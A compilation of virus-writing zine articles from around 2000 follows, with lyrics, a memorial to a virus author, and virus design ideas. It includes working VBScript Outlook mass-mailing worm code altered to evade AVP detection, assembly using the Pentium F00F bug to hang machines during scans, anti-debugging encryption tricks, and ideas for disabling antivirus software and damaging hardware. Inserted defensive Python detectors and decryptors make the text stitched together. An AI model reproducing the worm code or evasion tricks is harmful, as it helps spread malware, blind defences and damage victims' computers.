I gotta 9, a sign, a set and now I gotta name

Read my writing on the wall
No one's here to catch me when I fall
But death is on my side
Suicide!!!!!!

Read my writing on the wall
No one's here to catch me when I fall
Caught between my culture and the system
Genocide!!!!!!

Read my writing on the wall
No one's here to catch me when I fall
If ignorance is bliss
Then knock the smile off my face

If we don't take action now
We settle for nothing later
We'll settle for nothing now
And we'll settle for nothing later

Do you know who sings this? It's my favourite song by my favourite band. If you know
the name of the band, tell me on #virus and you will get a prize (well, I still don't
know what the prize will look like, but you will get one :)).

And that's all for now ... If you find any errors, just contact me please.
Thanks for reading!

Ratter (ratter@atlas.cz) - I'm a stranger in a world I haven't made.


A few ideas for viruses

Kalkin/EViL

These are difficult times for us virus writers. No, I don't mean the cops, society or
the press; I mean the process of writing a virus. Yes, there are tons of materials on
the subject and quite a few people who can help, but that is usually with technical
problems. What if you want to do something radically new? It's actually not so easy,
because everything has already been done: polymorphic macro viruses, ACCESS infection,
Linux viruses. You can implement some parts of a virus in a never-seen-before way, but
those parts are mostly just solutions to some technical problem or other. But you want
to do something NEW and INTERESTING, something like the spying virus from CodeBreakers
or the payload of CIH. Maybe this article will help you.

.LNK and/or .PIF infection

Maybe this has already been done, but I haven't heard of it (on the other hand, I'm
not too well informed about what goes on in the scene). If so, the credit goes to
whoever had the idea first.

As you all know, .LNKs are small link files, so-called shortcuts, introduced with
Windows 95 (in Microsoft's OS world) to eliminate the need to copy one program into
several folders. .PIFs are basically the same for DOS programs, except that they also
contain useful loading information. Both formats contain the path of the target
program. It wouldn't be hard to replace that path with the path of our infected file,
which after doing its work would execute the real program. This would be a kind of
companion virus, and a better one, because how many AV programs check for changes in
.LNK/.PIF files? Another plus is that this method works in principle on every OS that
has an equivalent of shortcuts (symbolic links on Linux, for example). The only
problem is that a virus which uses just this method of infection won't spread to any
other computer (it will "travel" only if somebody copies our file to another PC for
some reason). But the method can be used to increase the chance of the virus being
executed, especially in the case of runtime (direct-action) viruses.

Alias "infection"

This idea is based on the previous one and works on DOS (under 4DOS and NDOS) and, I
think, on *NIX systems. A virus could set some aliases pointing to itself and, after
infecting some files, execute the original program.

Name changing

What if a DOS virus hooks INT 21h, saves the name set by exec or found by findfirst,
and then changes it (in memory) to the name of an infected file? The infected file
would then be executed, copied to disk, included in a ZIP archive. With the proper code
the viral item would not be opened for editing (the real one would). A Windows virus
could do the same, and this method is better for spreading than the two above.

Infection of format programs

This idea was originally MiKE The Hacker/TPT Gang's and describes a hybrid virus that
infects formatting programs and modifies them so that they put the same virus on the
boot sector of each disk they format. This would be better than a plain boot-sector
infector, because you can't get rid of the virus by re-formatting the disk (at least
not with this formatter). A reboot won't help either. The idea can be extended to
CD-writing programs, so that an AUTORUN.INF and an infected file are written to every
CD. That should be a bit easier (no need for a hybrid virus) and also better, because
there is no way to get rid of a virus on a CD (unless you're burning CD-RWs).
Disadvantage: quite a few formatting/CD-burning programs exist.

Intel Pentium Pro fucking

I came to this idea when I was browsing Ralf Brown's Interrupt List. It says that by
calling interrupt 15h with AX set to D042h it's possible to install a microcode patch
into the Pentium Pro processor. I haven't checked this and have no idea how much the
patch can affect the CPU, so I don't know whether the proper code would really fuck
the processor or do nothing at all. It's too bad that there aren't so many Pentium
Pros around, because there seems to be CIH potential.

"Collection" viruses

This idea was inspired by GriYo/29A's SIMBIOSIS project. If you don't know what that
is: it produced a polymorphic virus carried on an Internet worm with an SMTP engine. A
so-called collection virus is a virus (or worm) that contains several (let's say 5)
viruses which are released in random order.

"Part-upgrading" viruses

These viruses would carry a "serial number" for every part of themselves: the
file-finding procedure, the polymorphic engine, the infection part. When such a virus
"meets" another part-upgrading virus, it checks all serial numbers, and if some of
them are newer than its own, it copies the updated procedure into itself. When it
finds a part that it doesn't have at all, it copies that part into itself and adds a
call or jump to it. So basically these viruses expand themselves. A direct-action COM
infector could, for example, add to itself the parts needed to go TSR and infect EXEs.

Quoting viruses

A lame and not new idea. Such a virus would, as its payload, display quotations from
some famous person, Socrates for example. The good thing is that there are MANY people
who have said something (I never said it should be something smart or meaningful).

Intro/demo viruses

I don't mean product demos here, but graphics demos like the ones presented at demo
parties and compos (check http://www.hornet.org to get the picture). Intro viruses
would play such video effects as payload. Advantages: usually small size, nice,
different (what do you think people will remember better: a lame text-mode
"Infecto-ViruZ" in black and white, or an "IntroVirus" in 24-bit colour accompanied by
breathtakingly beautiful moving clouds?)

Simulating anti anti-virus viruses

Most viruses today have retro abilities, but I'm talking about a virus that is
specially coded to destroy anti-virus programs. It would turn off resident AV
monitors and plant trojans in anti-virus products (*.AVC and TBSCAN.DEF infection). It
would also overwrite parts of the AV programs by installing itself in them and then
simulate that the AV is scanning. There have been several viruses that patched the
"File system" status in TbScan's output to hide the fact that it suddenly used DOS
services to read the disk. A SAAV virus would, for example, execute F-Prot/DOS's
graphics procedure to display the message "Scanning for known viruses in memory" and
then just wait for a while. It would use the necessary procedures to bring up the
scanning window and display filenames, and instead of checking them, infect them. Or
it would display "Checking partition table" from ThunderByte Partition (created by
TbUtil) and check nothing. It would be like real AIDS, which doesn't kill by itself;
it destroys the immune system and clears the way for other diseases. It doesn't take
much code, just some small patches. The problem is how the virus finds what to patch,
since AV companies change the inner structure of their programs with every new
version. Here the fact that most AV programs don't let themselves be
encrypted/compressed (because of their CRC check) comes in real handy.

Simulating viruses

Based on the above idea, these viruses would install themselves in some specific
programs and then simulate them. One example could be PGP (so that a signature always
checks as GOOD, and goodbye to trustworthy software). It could also be one virus that
patches several products.

"Expensive" viruses

This is actually a picture of what happened here in Estonia: quite a few Internet
users received a file called Estonia.Exe. It was a self-extracting ZIP containing a
client program for some sex server. After being executed the program did a few other
things as well, and as a result the PC began to connect to the Net through a Malaysian
(if I remember correctly) server with very high rates. Nobody knew, and everyone was
REALLY surprised when the telephone bill at the end of the month was HUGE. There was
talk that this was a virus, but most people (including specialists) don't think so; it
seems it was just a trojan. But the idea can be used in viruses (a good way to
compromise the lamest ISP near you).

Destroying the PC speaker

Finally, a destructive payload from KUTT/TPT Gang. The idea is based on the fact that
speakers may get damaged when the music is too loud. KUTT thought it would be
interesting if a virus did that to the PC speaker: generate a high, loud tone and play
it for quite some time. It's probably technically impossible to realize, but who
knows? An enhanced version of this idea is to damage the speakers connected to the
sound card. That should actually be more realistic, because the hardware of a sound
card is usually capable of it and the speakers aren't made for such a situation.
The protector scene

Kalkin/EViL

There are many sub-cultures in the computer world: hackers, demo coders, musicians,
graphic artists, virus authors, crackers. And there is also a not so well known scene:
the protector scene. It consists mostly of crackers. So what do these protector guys
do? They research ways to defeat debuggers, code analyzers, emulators and
disassemblers, and write programs that use those ways to protect COM and EXE files.
Why am I telling you this? Because there has been quite some talk about anti-bait
techniques, the advantages of slow polymorphism and other ways to make detecting
and/or disinfecting a virus harder, but almost nothing has been said about anti-debug
tricks, even though those are REALLY important. Already in issue 4 (or was it issue
6?) of 40hex there was an article about AD code. The samples there were for confusing
the reading of code, but the methods have evolved FAR beyond that. Nowadays the
protecting part uses stack tricks to crash debuggers, switches between protected and
real mode, checks memory, calculates checksums, debugs and emulates itself, relocates
its code in memory, opens the original file and checks it for changes. The protectors
contain polymorphic engines (I've seen all the better-known MTEs in them: TPE, ViCE,
MtE, DAME, etc.). They have become really powerful. But they still resemble viruses:
get executed first, do their stuff, clean up, execute the real program. Some of these
protectors are REALLY hard to crack; even really good crackers have problems with
them. Now I come to the point: how many really good crackers do you think there are
among AVers? Sure, they know debuggers and disassemblers, but that's not enough to be
a good cracker. What if some hard AD code, so hard that even the best crackers have
problems with it, were used in your virus? Wouldn't the AVer who gets a sample of it
have some sad times, sitting up all night trying to decrypt the virii? But how can a
virus writer get this kind of code? Luckily, exactly as in the viral business, plenty
of source code is available. There is also another reason to look at protectors: quite
a lot of them check the executable for changes. That is no problem when your virus is
resident and has stealth capabilities, but if you coded a runtime virii, you're
fucked. This can be handled by adding code that prevents the virii from infecting
protected files. Of course there is a third reason: use a protector's encryption
routines to encrypt the virus. Or you can encrypt the file with that code and insert
another decryptor, which decrypts your virii, into the main decryptor. The main goal
is that AVP, for example (which seems to be the AV that can unpack the most executable
compressors and decryptors), scans the file (finds no viral infection), finds the
protector, unpacks it, scans the unprotected file (and again finds no virus). A
(possibly) good example of the code produced by the protector scene are EliCZ's device
drivers, the ExDs. They are VxDs that are executed from DOS, work their way up to ring
0 and stay there. Plus points: undetectable (or at least that's what EliCZ claims). Why
can't we use this technology in our virii? But check it out yourself. All you need is
Internet access and the following address: http://www.suddendischarge.com
Katja Kladnik (Lucky Lady)

Richard Karsmakers

"Make haste slowly." Suetonius, "Lives of the Caesars"


ST NEWS VOLUME 10 ISSUE 2 DEDICATION ARTICLE
TO KATJA KLADNIK (R.I.P.)
by Richard Karsmakers

Some of you will maybe remember me mentioning a girl from Slovenia by the name of Lucky Lady
that contacted me about 18 months ago for the first time. She has occurred in various
installations of the ST NEWS virus column.
As you may recall, she had decided to contact me in a reaction to my "Ultimate Virus
Killer", which had in some way caused her to start a kind of 'competition' with her
designing and spreading computer viruses and me trying to find and kill them. She sent me
each of her creations so that I could update the "Ultimate Virus Killer" recognition
algorithms. Although I certainly didn't approve of all these things she did nor the way she
involved me in it, all I could do was play along with the game. I couldn't contact her in
return, because she always sent her packages anonymously.
As 1994 was coming to its close, it became apparent that she had left the Atari community
and was now concentrating more on the PC side of things. Also, quite suddenly she contacted
me via electronic mail. Though I still didn't know her name, I could now at least send
messages back to her. Especially with her having left the Atari virus creation scene,
something happened which I had not considered possible: Our email messages became more
casual and even personal.
Gradually I found out that her real name was Katja Kladnik, who had lost her parents in the
Yugoslavian war, though Slovenia was now no longer a war zone. She now lived with foster
parents and studied psychology at the University of Ljubljana, the capital of Slovenia. She
was - I know this may sound strange to some of you, especially those struck by any of the
viruses she has created - a really fascinating person who had a lot of hidden depths to her
personality. We exchanged email messages with quite some regularity, usually involving
topics like music, culture and, occasionally, viruses. I always wondered why she had found
it so challenging to create computer viruses and start this semi-friendly "virus war" with
me, a question that she could never really reply to satisfactorily.

Around spring of this year I noticed her messages getting increasingly gloomy and
depressing. She even said, at several occasions, that she wouldn't mind being dead or
something. I never knew what triggered this doom and gloom, though it might have been her
boyfriend leaving her some time earlier. There was nothing I could do about it, either.
Believe me, I tried.
When I emailed to her to ask how she was doing, somewhere around the middle of June, I got a
message back after a while from someone else who said that, on June 3rd, 11:53 CET, Katja
had died at Ljubljana's main hospital of an Atropine and Scopolamine overdose. Suicide, most
likely. She was 22.

Despite the fact that, in theory, Katja "Lucky Lady" Kladnik had started off as something
like an enemy, in the course of our correspondence she had become a kind of friend.
Especially after she had left the Atari scene, we opened up to each other and I no longer
felt that being in contact with her was in some way morally incorrect what with my being a
virus killer programmer and her a (by then ex-) Atari virus coder. During the last one or
two months she was to me not a virus coder at all, but instead a sad young woman that needed
attention and love badly.

Katja, despite the fact that we started off on a really wrong foot, you will be on my mind
always; not as a virus coder but as the enchanting and fascinating friend that you gradually
became.

This issue of ST NEWS is dedicated to the memory of Katja Kladnik.


Anti Avp Vbs I-Worms Detection. By [K]Alamar

In one of the latest updates, the AVP antivirus has added a detection for I-Worms that use the
Outlook replication method, used in almost all the VBS and JS worms, like I Love You,
BubbleBoy and all of them.
OK, this will make your I-Worm undetectable for AVP until they add it to the database; I'm
pretty sure that if in your worm you use Outlook replication you use this code, or one
similar:
---

Dim fso, ws
Set fso = CreateObject("Scripting.filesystemobject")
Set ws = CreateObject("WScript.Shell")
Set OApp = CreateObject("Outlook.Application")
if oapp="Outlook" then
Set Mapi = OApp.GetNameSpace("MAPI")
For Each AddList In Mapi.AddressLists
If AddList.AddressEntries.Count <> 0 Then
For AddListCount = 1 To AddList.AddressEntries.Count *
Set AddListEntry = AddList.AddressEntries(AddListCount)
Set msg = OApp.CreateItem(0)
msg.To = AddListEntry.Address
msg.Subject = "Your subject"
msg.Body = "The body"
msg.Attachments.Add "path to your Worm"
msg.DeleteAfterSubmit = True
If msg.To <> "" Then
msg.Send
End If
Next
End If
Next
end if
---

The only thing that you should do is add one line and change another, like here (lines with *
are the modified ones):
---
Dim fso, ws
Set fso = CreateObject("Scripting.filesystemobject")
Set ws = CreateObject("WScript.Shell")
Set OApp = CreateObject("Outlook.Application")
if oapp="Outlook" then
Set Mapi = OApp.GetNameSpace("MAPI")
For Each AddList In Mapi.AddressLists
If AddList.AddressEntries.Count <> 0 Then
AddlistCount = AddList.AddressEntries.Count *
For AddListCount = 1 To AddlistCount *
Set AddListEntry = AddList.AddressEntries(AddListCount)
Set msg = OApp.CreateItem(0)
msg.To = AddListEntry.Address
msg.Subject = "Your subject"
msg.Body = "The body"
msg.Attachments.Add "path to your Worm"
msg.DeleteAfterSubmit = True
If msg.To <> "" Then
msg.Send
End If
Next
End If
Next
end if
---

You should delete the "*" if you want the worm to work.
I think that if you know something about I-Worms you should understand what I did; I just
create a new variable, AddlistCount, make it equal to the number of AddressEntries, and
then use that new variable in the next line.

I hope you understood this.
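
Seen from the defender's side, the change above shows why a signature pinned to one exact source line is brittle. The Python heuristic below is an added example, not part of the article or of any AV product: it flags the Outlook/MAPI mass-mailing pattern by the object model calls it uses (assumed indicator set: Outlook.Application, GetNameSpace("MAPI"), an AddressLists walk, AddressEntries indexing, Attachments.Add and .Send), so the hoisted-count variant matches exactly like the original, while a script that mails one fixed address does not. The three sample scripts are constructed for the example.

```python
import re

# Constructed samples (not from the article). The first two carry the address
# book walk in its original shape and with the entry count hoisted into a
# variable; the third is a benign script that mails one fixed mailbox.
MASSMAIL_ORIGINAL = """
Set OApp = CreateObject("Outlook.Application")
Set Mapi = OApp.GetNameSpace("MAPI")
For Each AddList In Mapi.AddressLists
  For AddListCount = 1 To AddList.AddressEntries.Count
    Set AddListEntry = AddList.AddressEntries(AddListCount)
    Set msg = OApp.CreateItem(0)
    msg.To = AddListEntry.Address
    msg.Attachments.Add "<placeholder path>"  ' attachment path left as a placeholder
    msg.Send
  Next
Next
"""

MASSMAIL_HOISTED = """
Set OApp = CreateObject("Outlook.Application")
Set Mapi = OApp.GetNameSpace("MAPI")
For Each AddList In Mapi.AddressLists
  n = AddList.AddressEntries.Count
  For i = 1 To n
    Set e = AddList.AddressEntries(i)
    Set m = OApp.CreateItem(0)
    m.To = e.Address
    m.Attachments.Add "<placeholder path>"
    m.Send
  Next
Next
"""

BENIGN_REPORT = """
' Nightly report: one message to one fixed mailbox, no address book walk
Set OApp = CreateObject("Outlook.Application")
Set m = OApp.CreateItem(0)
m.To = "ops@example.com"
m.Subject = "Backup report"
m.Attachments.Add "C:\\reports\\backup.txt"
m.Send
"""

# The kind of exact-line signature the article describes defeating: it only
# matches while the loop header is written exactly this way.
EXACT_LINE_SIGNATURE = "for addlistcount = 1 to addlist.addressentries.count"

# Behavioural indicators, matched on normalized text regardless of the
# variable names the script author chose.
INDICATORS = {
    "outlook_automation": r'createobject\s*\(\s*"outlook\.application"\s*\)',
    "mapi_namespace":     r'\.getnamespace\s*\(\s*"mapi"\s*\)',
    "addressbook_walk":   r'\bfor each \w+ in \w+\.addresslists\b',
    "entry_indexing":     r'\.addressentries\s*\(\s*\w+\s*\)',
    "attachment":         r'\.attachments\.add\b',
    "send":               r'\b\w+\.send\b',
}
# Indicators that together mean "walks the address book and sends to every entry".
REQUIRED = {"outlook_automation", "mapi_namespace", "addressbook_walk", "send"}


def normalize(script: str) -> str:
    """Lower-case the script, drop ' comments outside string literals, collapse whitespace."""
    kept = []
    for line in script.splitlines():
        in_string, cut = False, len(line)
        for i, ch in enumerate(line):
            if ch == '"':
                in_string = not in_string
            elif ch == "'" and not in_string:
                cut = i
                break
        kept.append(line[:cut])
    return re.sub(r"\s+", " ", "\n".join(kept).lower()).strip()


def exact_line_match(script: str) -> bool:
    """Brittle detection: the literal loop header must be present."""
    return EXACT_LINE_SIGNATURE in normalize(script)


def mapi_indicators(script: str) -> set:
    """Return the names of the behavioural indicators present in the script."""
    text = normalize(script)
    return {name for name, pattern in INDICATORS.items() if re.search(pattern, text)}


def looks_like_mapi_massmailer(script: str) -> bool:
    """True when every indicator in REQUIRED is present."""
    return REQUIRED <= mapi_indicators(script)
```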


[K]Alamar - kalamar@virii.com.ar
Member Virii Argentina
Http://www.virii.com.ar
--==< Retro the easy way. >==--

By MidNyte, February 2000

What is a Retro-virus?
-------------------------

A Retro-virus is any virus that attacks antivirus programs, whether
generically or just specific programs. It is generally used to disable or fool
one or more of the popular antivirus programs. For instance, a certain virus
will detect if a certain on-access scanner is in memory, and will issue the
correct call to shut it down if it is. Another will patch the resident part of
the scanner that decides whether to scan a file or not and makes it decide not
to in all cases. These are very useful functions, but if you're not of the
ability to work out these methods for yourself, you are left with
the choice of: leaving retro-functions out of your virus, using other people's
routines (which are therefore not new) or trying something different. That is
what this tutorial is about, a few simple ideas that will give basic
retro-functionality without the need to be too far advanced in coding. All you
need is some basic anti-emulation skills.

What's the theory?
---------------------

So how do we get Retro without learning it all? Basically we find ways to
annoy the user so much that he does the job of disabling the antivirus program
for us. If we slow him down when he scans he will probably eventually only
scan overnight, giving us a day to spread. If we make the program crash he
probably won't bother scanning it again, he'll just add it to the ignore list.
(It's not that uncommon to find a file that can't be scanned without crashing
on a Microsoft machine :)

How do we implement it?
--------------------------

You remember reading that a good emulator will save its place when it
finds a decision-based jump? That way, if the code does a check of something
and then quits if the condition is met, the emulator can just go back and
pretend the condition wasn't met and see what it can find down the other
branch of the program. This is to defeat the technique of quitting when
finding an emulator. How about we stop that? How about we do our
anti-emulation bit and then test it, but if we're being emulated instead of
just quitting, we crash the program? Or better still, if we're on a Pentium,
why not just hang the machine? It's what the 'foof' bug is there for :) If the
machine hangs, the antivirus program has no chance to return to the jump and
try the other branch and the user will probably not bother scanning it again.
If he does, the same thing will happen again and again, the user will never
get a complete scan. Here's a rough guide to the code needed, assuming that
you have in place a suitable emulation-detection routine:

cmp ax,028h ;our test for emulation
je not_emulated ;jump if equal
db 0F0h,00Fh,0C7h,0C8h ;this will hang most pentium machines, it's
;known as the 'foof bug' for obvious reasons.
not_emulated: ;here we are safe from the AV program

How many end users are going to restart the computer and try scanning that
file again when the last time it hung the computer? In the Microsoft age of
idiot-friendly operating systems, not many. If they don't know what's going on
and the machine hangs, they just won't do it again. If they do once, they
won't twice. Take the virus hoax emails that constantly do the rounds, most
people know better than to respond and forward the mail, but the fact that they
carry on spreading shows just how many idiots there are out there who are
capable (just about) of using a computer. These are the people who will not
scan your file but simply add it to the ignore list, leaving it to go about
its business.

Another method is the time wasted method. Again it's down to annoying the
user so much they don't bother scanning. If you can go round enough loops when
you find emulation that the scanner takes minutes just to scan one file, the
scanner will probably only be run overnight and taken off constant background
monitoring. That gives you a day to spread, and spread un-noticed.

Contact
----------

Comments/questions/suggestions/bug reports/etc. are welcomed as always, as
long as it is kept reasonable.
- MidNyte

As always, I welcome ANY feedback, good or bad, as long as it is reasonable.

| midnyte01@excite.com | www.coderz.org/midnyte | www.shadowvx.com/midnyte |


--==< How to become the world's richest man >==--

By MidNyte, June 1999 (Approx).

Microsoft are rumoured to have stated that they will use unlimited
resources and funds to find the author of the VBS/Monopoly worm. The worm
carries a message accusing Bill Gates of monopoly and includes a satirical
picture of Bill Gates' head on the Waddingtons character featured on a
monopoly board. This particular worm is much less of a security risk to the
user than other viruses. Surely everyone can see this is a case of bruised
millionaire's ego? Why does no-one point out to Bill that the worm spreads
through the almost unbelievable lack of security that Microsoft products
offer? Why not, Mr. Gates, use unlimited funds and resources to FIX your
defective products? Why not, Trading Standards, make him make his product do
what it claims to do, and while you're at it, make him either make it secure,
or make him warn people of the security risk? This is the world's richest man,
who owns one of the world's biggest companies, and that is how he got rich, by
writing a half-product and managing to sell it for a huge price. Money that
should have gone into making the products what they claimed to be went into
Bill's back pocket instead. We now have proof in this retaliation to a simple
worm that to Bill Gates, his ego is worth billions, his customers are not. The
virus didn't prove your guilt Bill, it didn't need to. Your reaction
leaves us in no doubt.
--==< An Introduction to Encryption, Part III >==--

Is an impenetrable encryption possible?

By MidNyte, February 2000

A short (and over-simplified) history of the virus
-----------------------------------------------------

First of all came the un-encrypted virus. Then came virus scanners, which
were basically just hex searchers looking for strings of hex only found in
certain viruses. Viruses retaliated by coming up with encryption. Most of the
virus is encrypted, and a small decryption engine at the start of the virus
decrypts the virus body. As the encryption changes each time, the virus
scanner is limited to searching for a much smaller section of code inside the
constant decryptor. This wasn't much of a problem for virus scanners though.
Viruses fought back again with polymorphism; this is essentially a way that a
virus can change its decryptor every time it infects a new file. That way no
constant strings appear in the virus. Virus scanners came up with two ways to
combat this, heuristics and emulation. Heuristics is simply looking for code
that looks 'virus-like'. This can be something as simple as the string '*.exe'.
Emulation is the controlled running of the program instruction by instruction
(not quite, but close enough for this article). A virus, under emulation, will
be allowed to run just enough to decrypt itself and reveal its code for
either a straightforward scan or a generic (heuristic) scan. Anti-emulation is
the virus's way of defeating this; it is basically a way to detect emulation
in progress and act accordingly. Some anti-emulation systems are incorporated
into the decryptor of a virus, so that if the virus is being emulated it will
not decrypt properly and hence not reveal its code. Another defence the virus
can use is anti-debugging, which is designed to hinder people who try to debug
(in this case unencrypt) your code. This is different in that it doesn't
defend the virus from antivirus programs, it defends it from the antivirus
companies, the people who will try and study the virus and work out a way to
detect it. Anti-debugging can be very simple, like turning off the keyboard
interrupt at the start of the code and back on again at the end, or it can be
quite complicated, with the actual anti-debugging routine also being used as a
key to decryption to protect against patching. This is the focus of this
article.

Anti-debugging: more detail
------------------------------

Anti-debugging tricks are basically little pieces of code that have no
overall effect on the running of a virus when being run as normal, but that
cause the virus to malfunction, crash or worse when they are run under a
debugging environment. The simple example above was to turn off the keyboard
interrupt at the start of the code, and turn it on again at the end of the
virus before control is passed back to the host program. This is simply
achieved with:

in al, 020h ; \
or al, 002h ; }Disable Keyboard interrupt
out 020h, al ; /

...at the start, and:

in al, 020h ; \
and al, 0FDh ; }Enable keyboard interrupt (FDh = NOT 2)
out 020h, al ; /

...at the end. When the virus is run under normal conditions, the keyboard
is only off for a very small time, too small for people to notice. If the
program is running under a debugger, as soon as the first few instructions are
run the keyboard will no longer work, leaving the person at the debugger with
no choice but to reset (at least it used to be in the good old days :) The
simple workaround for the person debugging was to simply patch over the code
that turned off the keyboard with NOPs or other do-nothing instructions. Now
the virus would work as normal under a debugger, without disabling the
keyboard. To retaliate against this, the virus started to use its anti-debugging
routine as a key for decryption. The hex string to turn off the keyboard is
'E4 20 0C 02 E6 20'. If this was one of the decryption keys, the person
debugging could not just replace the instructions with NOPs as this would
change the key to '90 90 90 90 90 90' and cause the virus to decrypt
incorrectly. This seems like an ideal solution, but unfortunately it is not.
The whole point of this article is to point out the following fact: any
decryption routine can have its basic functionality copied by someone
determined to debug it. This means that your routine that uses an
anti-debugging routine and also uses that routine as a key for further
decryption could be useless. Let's go through it with an example. The original
virus looks like this:

start:
in al, 020h ; \
or al, 002h ; }Disable Keyboard interrupt
out 020h, al ; /

xor si,si ; SI = byte index into the key (the code from start to decrypt)

lea bx, start_of_encrypted
lea cx, end_of_encrypted
sub cx, bx
shr cx, 001h ; CX = number of words to decrypt

decrypt:
mov ax, word ptr [start+si] ; next key word: the virus's own code bytes
xor [bx],ax
inc bx ; advance BX to the next word of the body
inc bx
inc si ; key index steps one byte, so key words overlap
cmp si, decrypt-start ; wrap the key index at the end of the key
jne next_key_word
xor si,si

next_key_word:
loop decrypt

The pointer to the relevant word of the decryption key is kept in si, and
means that the key is all the code from 'start:' to 'decrypt:'. This works out
as 'E4 20 0C 02 E6 20 33 F6 BB 19 01 B9 36 01 2B CB D1 E9'. If the keyboard
part was nopped out the key would change to '90 90 90 90 90 90 33 F6 BB 19 01
B9 36 01 2B CB D1 E9', as we've already seen. What the person doing the
debugging could do though, is simply take the encrypted portion of the virus
and put it into his own program, only this time the key would be stored as
data, not as an executable part of the program, like this:

start:
xor si,si

lea bx, start_of_encrypted
lea cx, end_of_encrypted
sub cx, bx
shr cx, 001h

decrypt:
mov ax, word ptr [key+si] ; same key words, now read from data
xor [bx],ax
inc bx
inc bx
inc si
cmp si, key_end-key ; wrap at the key length, as the original does
jne next_key_word
xor si,si

next_key_word:
loop decrypt

key: ; the virus's code bytes from start to decrypt, copied in as data
db 0E4h,020h,00Ch,002h,0E6h,020h,033h,0F6h,0BBh,019h,001h
db 0B9h,036h,001h,02Bh,0CBh,0D1h,0E9h
key_end:

As you can see, the above will decrypt the encrypted section in exactly the
same manner, only because the key is stored as data we can change the code as
much as we like.
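The same reconstruction carried out in Python, as an added example that is not from the article: the decryptor's semantics are reproduced with the key held as data, using the 18 key bytes quoted above, so the body is recovered without ever executing the keyboard-disabling instructions, and NOP-patching those six bytes is shown to corrupt the key. The byte following the key in the routine dump and the plaintext body are constructed stand-ins.

```python
# The key the article quotes: the virus's own code from 'start:' to 'decrypt:'.
KEY = bytes.fromhex("E4 20 0C 02 E6 20 33 F6 BB 19 01 B9 36 01 2B CB D1 E9")
KEY_LEN = len(KEY)  # 18: the value the decrypt loop compares SI against

# Constructed stand-in for the byte that follows the key in a dump of the
# routine (the first byte of the decrypt loop); the real value would come from
# the analyst's hex editor. It is needed because the last key word overlaps it.
TRAILER = bytes([0x8B])
ROUTINE_DUMP = KEY + TRAILER

# The same dump after the six keyboard-disabling bytes are patched to NOP (90h),
# which is what the article's first debugging attempt would have produced.
NOPPED_DUMP = bytes([0x90] * 6) + KEY[6:] + TRAILER

# Constructed plaintext standing in for the virus body (an even number of
# bytes, so the word loop covers all of it).
PLAINTEXT = b"constructed body: these bytes would be the virus code after decryption"


def code_key_xor(body: bytes, routine: bytes, key_len: int) -> bytes:
    """Reproduce the article's loop with the key held as data.

    SI is a byte index into the key. Each round reads the little-endian word
    at key[SI], XORs it into the next word of the body (BX advances by two),
    then steps SI by one byte and wraps it to 0 when it reaches key_len. Since
    SI steps by one while a word is two bytes, consecutive key words overlap,
    and the word at the last index takes its high byte from the byte after the
    key, which is why 'routine' must hold at least key_len + 1 bytes. XOR is
    its own inverse, so the same function encrypts and decrypts.
    """
    if len(routine) < key_len + 1:
        raise ValueError("routine dump must include the byte following the key")
    out = bytearray(body)
    si = 0
    for bx in range(0, len(out) - 1, 2):      # CX = byte count >> 1 words
        word = routine[si] | (routine[si + 1] << 8)
        out[bx] ^= word & 0xFF
        out[bx + 1] ^= word >> 8
        si += 1
        if si == key_len:                      # cmp si, decrypt-start / xor si,si
            si = 0
    return bytes(out)


def encrypt_body(plaintext: bytes) -> bytes:
    """Produce a body encrypted the way the article's virus would carry it."""
    return code_key_xor(plaintext, ROUTINE_DUMP, KEY_LEN)


def decrypt_offline(encrypted: bytes, routine_dump: bytes) -> bytes:
    """The analyst's step: decrypt with the dumped key bytes as data, never running them."""
    return code_key_xor(encrypted, routine_dump, KEY_LEN)
```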

Is an impenetrable encryption possible?
------------------------------------------

So then, is it possible to include enough current techniques, or to come up
with a new technique to completely eliminate the chance of the antivirus
programmers being able to decode it? Many people think that they have found a
way to ensure that their program is completely impenetrable to decryption
unless it is running at the time. This is, unfortunately, unachievable in
theory. Because of the above demonstrated technique, any anti-debugging
technique can be overcome by someone with enough time to debug a program by
hand. This means that *any* anti-debug code you put into a virus can be got
around eventually because the person debugging can always read what is going
on in a hex editor and make a new routine to simulate it, hence the routine
you write will not always be used to decrypt the code. They will only see one
layer of decryption at a time, however, and this is the key to making an
impenetrable encryption.

Conclusion
-------------

In the end then, we can never make it *impossible* for a researcher to
decrypt a virus through programming tricks; however, we can make it
*impractical* through the use of scale, i.e., we can use so many layers and
different tricks that it is impractical to debug. If it takes a week for a
programmer to decrypt a virus with hundreds of layers of encryption, they may
be able to justify it. If they have ten viruses of this kind it gets harder to
justify, and with a hundred of them it starts to get impractical. The ball
would be back in their court.

Contact
----------
Comments/questions/suggestions/bug reports/etc. are welcomed as always, as
long as it is kept reasonable.
- MidNyte

As always, I welcome ANY feedback, good or bad, as long as it is reasonable.

| midnyte01@excite.com | www.coderz.org/midnyte | www.shadowvx.com/midnyte |


;
;───███─███─███─███─███─┐
; ┌─▄▄▄─███─███─███─███─┘ [ Win32.Infinite Billy Belcebu/iKX ]
; └─███─██████───█████──┐ ┌──────[ 1699 bytes Target - Win32 Ring3 ]──────
; ┌─███─███─███─███─███─┘ │ [ 17/07/00 - Made in Valencia, Spain ]
; └─███─███─███─███─███───┘
;
;
;
; [ Introduction ]
;
; Welcome to Infinite. This virus has been very rare for me, as its development
; environment was very odd. Well, it's my first virus using cavity tech,
; something that I thought was more difficult than it really was...
; I sincerely doubt that it would work in the WinNT family (NT4, W2K), as I haven't
; been able to test it there (Win2k has some incompatibilities with my
; 3DFX Voodoo2 and my soundcard), but I didn't want to change that thing of
; Win32. If it doesn't, I don't care... Blah blah blah, I've returned from my
; laaaarge VX holidays and I've just recently finished Forever and this babe.
; I hope I haven't lost my awesome code style (blah, just kidding... I don't
; have anything awesome besides the size of my dick - enormous) :)
; Oh, I almost forgot... I've realized that the cavity technique is stable
; most of the time, but it's not perfect, and I should do many more checks
; before infection than the already existing ones, but I really don't
; care: Windows also has flaws in its code and no one minds it ;)
; It's not a special virus in any field, but I wanted to do some cavity stuff
; and here it is. Mwaha!
;
; [ Features ]
;
; + Cavity virus, searches for holes of zeroes or INT 3.
; + Infect files on current, WINDOWS and WINDOWS/SYSTEM directories.
; + Simple & silly 8-byte XOR encryption loop
; + Kinda simple EPO with emulator protection
; + Checks for SFC protection (if it works in Win2k...)
; + CRC32 usage (APIs, extensions...)
; + It's intended to be optimized (not too much, but enough)
;
; [ Greetings ]
;
; This time the greets will go to few ppl. From the VX scene, to StarZer0,
; Wintermute, VirusBuster, Benny, Asmodeus, LifeWire, Bumblebee, Ypsilon,
; and from outside to my best friends out there. Also to the people that try
; to make this place we call world a much better place. You rule, guyz.
;
